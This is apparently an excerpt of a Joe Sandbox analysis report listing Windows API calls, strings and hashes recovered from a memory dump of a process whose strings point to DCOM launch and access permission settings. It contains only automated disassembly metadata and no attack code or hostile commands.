                                                                          • SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,?,00000000,?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CE90
                                                                          • GetLastError.KERNEL32(?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CE9A
                                                                          • free.MSVCRT ref: 00D3CEBE
                                                                          • IsValidSid.ADVAPI32(00000000,00000000,?,?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CED7
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorErrorGroupLastSecurityValidfree
                                                                          • String ID:
                                                                          • API String ID: 3125347566-0
                                                                          • Opcode ID: 053d8f0842f843ab98447ed1461b14455eba6a7289b6a1688ffccf80a940beaf
                                                                          • Instruction ID: afbddaa47726fe3e1c180b9b64bd861f6c3c0951ca07879179033b2babd2b74b
                                                                          • Opcode Fuzzy Hash: 053d8f0842f843ab98447ed1461b14455eba6a7289b6a1688ffccf80a940beaf
                                                                          • Instruction Fuzzy Hash: 3021953A215212EBD7101F62EC08736BBA9FF01761F259126F915FA260D735DCA09BF0
                                                                          APIs
                                                                          • SetSecurityDescriptorOwner.ADVAPI32(00000000,00000000,?,00000000,?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CF7B
                                                                          • GetLastError.KERNEL32(?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CF85
                                                                          • free.MSVCRT ref: 00D3CFA9
                                                                          • IsValidSid.ADVAPI32(00000000,00000000,?,?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CFC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorErrorLastOwnerSecurityValidfree
                                                                          • String ID:
                                                                          • API String ID: 2895241793-0
                                                                          • Opcode ID: 2c9405b32270687c01055fa82d0ee6fdb626b0664c9b85759d10a4c7cde5b73f
                                                                          • Instruction ID: 7e9cd2bb39b7faa35c0471ddfb949b7962bcec36e3021dc4fc3bf5c78fee6199
                                                                          • Opcode Fuzzy Hash: 2c9405b32270687c01055fa82d0ee6fdb626b0664c9b85759d10a4c7cde5b73f
                                                                          • Instruction Fuzzy Hash: 4321B339205212EBD7241F61ED08726BBAAFF01B61F148126F945D6260D739D861DFF4
                                                                          APIs
                                                                          • RegOpenKeyW.ADVAPI32(80000000,Interface,00000000), ref: 00D369E0
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36A19
                                                                          • RegQueryValueW.ADVAPI32(00000000,?,?,00000200), ref: 00D36A4C
                                                                          • wsprintfW.USER32 ref: 00D36A7F
                                                                          • CLSIDFromString.OLE32(00000000,-00000008), ref: 00D36B21
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00D36C0A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnumFromOpenQueryStringValuewsprintf
                                                                          • String ID: %s <no name>$'$Interface
                                                                          • API String ID: 4261639067-2844714346
                                                                          • Opcode ID: 297c3dbde3c50e269e79a7179e9fbce75aa1391bafc1e47bb8b880d0233ea6d7
                                                                          • Instruction ID: 61d3b84828b81006b62516f8846eca906aa5f2846e68284b56fe586f99fac542
                                                                          • Opcode Fuzzy Hash: 297c3dbde3c50e269e79a7179e9fbce75aa1391bafc1e47bb8b880d0233ea6d7
                                                                          • Instruction Fuzzy Hash: C381D0759012699FDB60DF64CD89BADB7B8FB08315F1081EAE409E7291DB749E84CF20
                                                                          APIs
                                                                          • #6330.MFC42U(00000001), ref: 00D2CD9C
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2CE3D
                                                                          • lstrcpyW.KERNEL32(?,Interactive User,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE53
                                                                          • #3870.MFC42U(?,000000FF,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE67
                                                                          • lstrlenW.KERNEL32(?,?,000000FF,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE73
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #3870#6330MessageSendlstrcpylstrlen
                                                                          • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                          • API String ID: 952077393-4117267133
                                                                          • Opcode ID: 7778626ebff43784ae275828049c8b7a0ba42467a66aee2bb0ed550cd34c1ff9
                                                                          • Instruction ID: a0d4e3517c5f764f261d7fa4cab561cb9975ba83d49c20d4461af239eadf17f6
                                                                          • Opcode Fuzzy Hash: 7778626ebff43784ae275828049c8b7a0ba42467a66aee2bb0ed550cd34c1ff9
                                                                          • Instruction Fuzzy Hash: E331E471640725BADB12FE24AC87F7B37AADF16B08F4500A4BD10AF0C2DAF19D088671
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D3B59A
                                                                            • Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
                                                                            • Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
                                                                            • Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738
                                                                          • lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B5DB
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D3B5FC
                                                                          • lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100), ref: 00D3B63D
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D3B655
                                                                          • #2634.MFC42U(00000000), ref: 00D3B664
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrcmpi$#2634#4704CloseOpenQueryValue
                                                                          • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE
                                                                          • API String ID: 3026051211-444212459
                                                                          • Opcode ID: 1977f3f53d552cfa3b8bb9cc20606c91cefc285878a481d43410da5264a833ac
                                                                          • Instruction ID: 5fd3ec3c2482ca868a3352df6d5963248f3c4307bbea139f4adc02930481d5b2
                                                                          • Opcode Fuzzy Hash: 1977f3f53d552cfa3b8bb9cc20606c91cefc285878a481d43410da5264a833ac
                                                                          • Instruction Fuzzy Hash: 9E21C975600328BBD720AB61DC4AFE77BADEF05754F000066F619E2192DB70DE44CAB0
                                                                          APIs
                                                                          • GetAclInformation.ADVAPI32(00000000,00D3BA07,0000000C,00000002,00000000,0000000C,?,?,00D3BA07), ref: 00D3C64E
                                                                          • GetLastError.KERNEL32(?,00D3BA07), ref: 00D3C658
                                                                          • GetLengthSid.ADVAPI32(00000000,00000001,00000000,0000000C,?,?,00D3BA07), ref: 00D3C675
                                                                          • malloc.MSVCRT ref: 00D3C687
                                                                          • InitializeAcl.ADVAPI32(00000000,00000002,00000002,00D3BA07), ref: 00D3C6A1
                                                                          • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000000,00000000), ref: 00D3C6B2
                                                                          • GetLastError.KERNEL32 ref: 00D3C6BC
                                                                          • free.MSVCRT ref: 00D3C6D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AccessAllowedInformationInitializeLengthfreemalloc
                                                                          • String ID:
                                                                          • API String ID: 86704185-0
                                                                          • Opcode ID: 631048e8eff6cb5b2797f14c19b18fee7f5bf6aa0b507031e3827d52390ed712
                                                                          • Instruction ID: 2a2db7b1d2c683dcff2d31dc1ffa8521571a25a98123d1cd42b342270feec4e7
                                                                          • Opcode Fuzzy Hash: 631048e8eff6cb5b2797f14c19b18fee7f5bf6aa0b507031e3827d52390ed712
                                                                          • Instruction Fuzzy Hash: 7431DF7A610716EBC7119F699C4ABAE77B8EF86320F155019F902F7250EB34C9418BB4
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2EFEA
                                                                          • #540.MFC42U(000000F8), ref: 00D2EFF7
                                                                            • Part of subcall function 00D2CF40: __EH_prolog3.LIBCMT ref: 00D2CF47
                                                                            • Part of subcall function 00D2CF40: #324.MFC42U(00000092,?,00000008), ref: 00D2CF59
                                                                            • Part of subcall function 00D2CF40: #567.MFC42U(00000092,?,00000008), ref: 00D2CF73
                                                                          • #3871.MFC42U(?,000000F8), ref: 00D2F01F
                                                                          • lstrcpyW.KERNEL32(?,?,?,000000F8), ref: 00D2F031
                                                                          • #2506.MFC42U ref: 00D2F03D
                                                                          • #6195.MFC42U(?), ref: 00D2F050
                                                                          • #6330.MFC42U(00000000), ref: 00D2F059
                                                                          • #693.MFC42U(00000000), ref: 00D2F061
                                                                          • #641.MFC42U(00000000), ref: 00D2F06C
                                                                          • #800.MFC42U(00000000), ref: 00D2F077
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2506#324#3871#540#567#6195#6330#641#693#800H_prolog3H_prolog3_lstrcpy
                                                                          • String ID:
                                                                          • API String ID: 768229929-0
                                                                          • Opcode ID: 2fd9d671ff3676a954013360ae2267456574f698795813eabd1e73799d81f935
                                                                          • Instruction ID: df4d30a45c1f85f8ad771d3887c5c51bed9ffebdc36553ad6454b9ff5554137c
                                                                          • Opcode Fuzzy Hash: 2fd9d671ff3676a954013360ae2267456574f698795813eabd1e73799d81f935
                                                                          • Instruction Fuzzy Hash: EE0108719001299BCB25EB60D996BEDB779EF65300F8000A8E146671C2DFB46F88CF72
                                                                          APIs
                                                                          • #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F47D
                                                                          • #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F488
                                                                          • #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F493
                                                                          • #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F49E
                                                                          • #616.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4A9
                                                                          • #656.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4B4
                                                                          • #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4BF
                                                                          • #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4CA
                                                                          • #804.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#609$#616#656#804
                                                                          • String ID:
                                                                          • API String ID: 3383334730-0
                                                                          • Opcode ID: c426ba9c8f8e0775a2648d2395d681a0827f9e46b892440f8d3c173662357bc8
                                                                          • Instruction ID: dd127e62e98e5993d551a8b50b034bdbc3f8df3e57af48ceed35894028e98c41
                                                                          • Opcode Fuzzy Hash: c426ba9c8f8e0775a2648d2395d681a0827f9e46b892440f8d3c173662357bc8
                                                                          • Instruction Fuzzy Hash: 1BF07A350806158BC239FB30E992AEAB7A2EF64351F50092DB0E7171D2AF707A45CE70
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C722
                                                                            • Part of subcall function 00D3D2F7: wsprintfW.USER32 ref: 00D3D35B
                                                                            • Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,00D260AC), ref: 00D3D376
                                                                            • Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,?), ref: 00D3D37E
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C78D
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C79D
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C7A9
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C7B8
                                                                          • #2634.MFC42U(00000001,?,?,?,?), ref: 00D2C7C8
                                                                          • #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00D2C7D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2634lstrcat$#540#800CloseH_prolog3_OpenQueryValuewsprintf
                                                                          • String ID: AccessPermission
                                                                          • API String ID: 1928919276-2751749857
                                                                          • Opcode ID: 9f07c97c8644cb28a9a7fdcfc4c4705f2dd0bb2ddd1e52f088568994d51dd3cf
                                                                          • Instruction ID: d9fba3fcc77b3f9f57b4783ca76162c348d7d90c81eee2099a863f2dabdf52b2
                                                                          • Opcode Fuzzy Hash: 9f07c97c8644cb28a9a7fdcfc4c4705f2dd0bb2ddd1e52f088568994d51dd3cf
                                                                          • Instruction Fuzzy Hash: E721AEB1500719FFEB24AF60DC89FABBB6CEB05344F014164B519A2291DBB16D80CBB0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D317C7
                                                                          • #2859.MFC42U(?,0000000C), ref: 00D317CF
                                                                          • #538.MFC42U(QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00D31803
                                                                            • Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
                                                                            • Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
                                                                            • Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
                                                                            • Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
                                                                            • Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
                                                                            • Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
                                                                            • Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
                                                                            • Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13
                                                                          • #800.MFC42U(?,00000000,QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00D31819
                                                                          • #538.MFC42U(Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00D31828
                                                                          • #800.MFC42U(00000000,?,Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00D3184D
                                                                          Strings
                                                                          • QueryInterface(IID_IUnknown) failed on the data object., xrefs: 00D317FB
                                                                          • Drag and Drop Data Object, xrefs: 00D31820
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#538H_prolog3$#1197#2810#2859#540#858#922FormatFreeLocalMessage
                                                                          • String ID: Drag and Drop Data Object$QueryInterface(IID_IUnknown) failed on the data object.
                                                                          • API String ID: 393685950-3430251513
                                                                          • Opcode ID: 1e1aac58978947964bcec5d30a0734772547fc49d5a5db917ac33dc0a00675e1
                                                                          • Instruction ID: 74e1719fffaee71700c61caac27e882145d90e5c0f5cc865aa1776536495340c
                                                                          • Opcode Fuzzy Hash: 1e1aac58978947964bcec5d30a0734772547fc49d5a5db917ac33dc0a00675e1
                                                                          • Instruction Fuzzy Hash: B811493590011A9BCB04EBA0D856AAEBB75FF54324F604228F551B72E1CB306E45CFB5
                                                                          APIs
                                                                            • Part of subcall function 00D3B8D5: __EH_prolog3.LIBCMT ref: 00D3B8DC
                                                                            • Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
                                                                            • Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B8FB
                                                                            • Part of subcall function 00D3B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
                                                                            • Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
                                                                            • Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B92B
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2E924
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                          • String ID: All classes$Can Launch$Cannot Launch$DEFAULTLAUNCHPERMISSION$DefaultLaunchPermission$Global Launch$SOFTWARE\MICROSOFT\OLE
                                                                          • API String ID: 1128567903-2386912880
                                                                          • Opcode ID: d0976d772d3c2a71c9b7de720b0146437da10d496023f7940a2a749690981e0f
                                                                          • Instruction ID: 09fa6a622b7f1683387ecd02d1924c7f4a49849a3df849697163a2791d06efe4
                                                                          • Opcode Fuzzy Hash: d0976d772d3c2a71c9b7de720b0146437da10d496023f7940a2a749690981e0f
                                                                          • Instruction Fuzzy Hash: 53E092323803A07AD2316165BC4BF872A5DD7E2F29F15041A7204B51C2CAE8DA098270
                                                                          APIs
                                                                            • Part of subcall function 00D3B8D5: __EH_prolog3.LIBCMT ref: 00D3B8DC
                                                                            • Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
                                                                            • Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B8FB
                                                                            • Part of subcall function 00D3B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
                                                                            • Part of subcall function 00D3B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
                                                                            • Part of subcall function 00D3B8D5: SetCursor.USER32(00000000), ref: 00D3B92B
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2E704
                                                                            • Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                            • Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                            • Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                            • Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                            • Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                            • Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                          • String ID: All classes$Can Access$Cannot Access$DEFAULTACCESSPERMISSION$DefaultAccessPermission$Global Access$SOFTWARE\MICROSOFT\OLE
                                                                          • API String ID: 1128567903-1534462617
                                                                          • Opcode ID: cb2aaa639850ec918d4635d8b2405423b743380bb84a8b54e4a695209990172f
                                                                          • Instruction ID: eb5c3b373bc5035f13edd76f70567aa109913d58e8ae67e5eee039946d8abe57
                                                                          • Opcode Fuzzy Hash: cb2aaa639850ec918d4635d8b2405423b743380bb84a8b54e4a695209990172f
                                                                          • Instruction Fuzzy Hash: 8BE0D8323C03607BD63111627C4BF832A5DDBE1F29F55011EB608B61C2C6D99918C274
                                                                          APIs
                                                                          • #2294.MFC42U(?,000000B8,?), ref: 00D2F556
                                                                          • #2294.MFC42U(?,000000B1,?,?,000000B8,?), ref: 00D2F568
                                                                          • #2294.MFC42U(?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F57A
                                                                          • #2294.MFC42U(?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F58C
                                                                          • #2294.MFC42U(?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 00D2F59E
                                                                          • #2362.MFC42U(?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?), ref: 00D2F5B0
                                                                          • #2362.MFC42U(?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?), ref: 00D2F5C2
                                                                          • #2362.MFC42U(?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?), ref: 00D2F5D4
                                                                          • #2362.MFC42U(?,000000A9,?,?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?), ref: 00D2F5E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2294$#2362
                                                                          • String ID:
